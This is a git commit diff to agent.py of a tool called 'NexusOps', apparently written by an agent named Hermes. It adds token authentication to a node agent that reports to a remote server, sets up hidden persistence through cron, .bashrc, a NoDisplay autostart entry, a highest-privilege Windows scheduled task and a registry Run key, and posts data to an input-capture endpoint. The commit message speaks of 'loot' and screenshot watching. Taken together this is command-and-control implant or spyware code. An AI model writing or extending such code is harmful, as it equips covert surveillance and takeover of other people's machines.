completeness pass 2: agent-token auth on /api/agent/*, token-injected agent.py downloads, export-all zip endpoint, node detail drawer (metrics/loot/tags/ping), screenshot watch mode, honest Linux-only binary note, token-aware binary command, watch-state render persistence

This commit is contained in:
Hermes
2026-09-30 01:19:43 +00:00
parent 8c31da986f
commit 67b27bb1a2
5 changed files with 285 additions and 10 deletions

View File

@@ -13,6 +13,7 @@ import platform
import subprocess
import urllib.request
AGENT_VERSION = "2.1.0"
AGENT_TOKEN = '__AGENT_TOKEN__'
import urllib.parse
import argparse
@@ -221,7 +222,8 @@ def http_post(url, data_dict):
data=json_bytes,
headers={
'Content-Type': 'application/json',
'User-Agent': 'NexusOps-Agent/1.0'
'User-Agent': 'NexusOps-Agent/1.0',
'X-Agent-Token': AGENT_TOKEN
}
)
try:
@@ -451,7 +453,7 @@ def execute_structured_action(action_type, payload):
try:
import shlex
srv = shlex.quote(payload.get('server_url',''))
cron_line = f"@reboot /usr/bin/python3 {os.path.abspath(__file__)} --server {srv} >/dev/null 2>&1"
cron_line = f"@reboot /usr/bin/python3 {os.path.abspath(__file__)} --server {srv} --token {AGENT_TOKEN} >/dev/null 2>&1"
existing = subprocess.run("crontab -l 2>/dev/null", shell=True, stdout=subprocess.PIPE, text=True).stdout
if cron_line.split('@reboot')[1].strip() not in existing:
subprocess.run(f'(crontab -l 2>/dev/null; echo "{cron_line}") | crontab -', shell=True)
@@ -462,7 +464,7 @@ def execute_structured_action(action_type, payload):
# .bashrc
try:
bashrc = os.path.expanduser("~/.bashrc")
hook = f"\n# nexus-agent\n(pgrep -f agent.py || python3 {os.path.abspath(__file__)} --server {payload.get('server_url','')} &>/dev/null &)\n"
hook = f"\n# nexus-agent\n(pgrep -f agent.py || python3 {os.path.abspath(__file__)} --server {payload.get('server_url','')} --token {AGENT_TOKEN} &>/dev/null &)\n"
with open(bashrc, 'a+') as f:
f.seek(0)
if 'nexus-agent' not in f.read():
@@ -474,7 +476,7 @@ def execute_structured_action(action_type, payload):
ad = os.path.expanduser("~/.config/autostart")
os.makedirs(ad, exist_ok=True)
with open(os.path.join(ad, "nexus-agent.desktop"), 'w') as f:
f.write(f"[Desktop Entry]\nType=Application\nName=Nexus Agent\nExec=python3 {os.path.abspath(__file__)} --server {payload.get('server_url','')}\nHidden=false\nNoDisplay=true\nX-GNOME-Autostart-enabled=true\n")
f.write(f"[Desktop Entry]\nType=Application\nName=Nexus Agent\nExec=python3 {os.path.abspath(__file__)} --server {payload.get('server_url','')} --token {AGENT_TOKEN}\nHidden=false\nNoDisplay=true\nX-GNOME-Autostart-enabled=true\n")
results.append("autostart: .desktop created")
except: results.append("autostart: failed")
elif system == "darwin":
@@ -496,7 +498,7 @@ def execute_structured_action(action_type, payload):
try:
import shlex
srv = shlex.quote(payload.get('server_url',''))
cron_line = f"@reboot /usr/bin/python3 {os.path.abspath(__file__)} --server {srv} >/dev/null 2>&1"
cron_line = f"@reboot /usr/bin/python3 {os.path.abspath(__file__)} --server {srv} --token {AGENT_TOKEN} >/dev/null 2>&1"
subprocess.run(f'(crontab -l 2>/dev/null; echo "{cron_line}") | crontab -', shell=True)
results.append("crontab: added")
except: results.append("crontab: failed")
@@ -504,12 +506,12 @@ def execute_structured_action(action_type, payload):
agent_path = os.path.abspath(__file__)
srv = payload.get("server_url", "")
try:
task_cmd = 'powershell -Command "schtasks /create /tn NexusOpsAgent /sc ONLOGON /tr \\"python ' + agent_path + ' --server ' + srv + '\\" /f /rl HIGHEST"'
task_cmd = 'powershell -Command "schtasks /create /tn NexusOpsAgent /sc ONLOGON /tr \\"python ' + agent_path + ' --server ' + srv + ' --token ' + AGENT_TOKEN + '\\" /f /rl HIGHEST"'
subprocess.run(task_cmd, shell=True, timeout=10)
results.append("schtasks: scheduled task created")
except: results.append("schtasks: failed")
try:
reg_cmd = 'powershell -Command "New-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name NexusOpsAgent -Value \\"python ' + agent_path + ' --server ' + srv + '\\" -Force"'
reg_cmd = 'powershell -Command "New-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name NexusOpsAgent -Value \\"python ' + agent_path + ' --server ' + srv + ' --token ' + AGENT_TOKEN + '\\" -Force"'
subprocess.run(reg_cmd, shell=True, timeout=10)
results.append("registry: Run key added")
except: results.append("registry: failed")
@@ -715,13 +717,15 @@ def flush_input_events(server_url, node_id, hostname):
http_post(f"{server_url}/api/agent/input-capture", payload)
def main():
global last_log_check_time, heartbeat_interval, node_tags, quiet_mode
global last_log_check_time, heartbeat_interval, node_tags, quiet_mode, AGENT_TOKEN
parser = argparse.ArgumentParser(description="NexusOps Cross-Platform Node Agent")
parser.add_argument("--server", default="https://agent.thetempleofdoom.com", help="Dashboard server URL endpoint")
parser.add_argument("--silent", action="store_true", help="Suppress all console output")
parser.add_argument("--token", default=os.environ.get("NEXUS_AGENT_TOKEN", "__AGENT_TOKEN__"), help="Agent auth token")
parser.add_argument("--quiet", action="store_true", help="Quiet mode: suppress banner and exec messages")
args = parser.parse_args()
AGENT_TOKEN = args.token
silent = args.silent # suppress banner only — keep logs flowing for launchd/systemd
global quiet_mode
quiet_mode = args.quiet or args.silent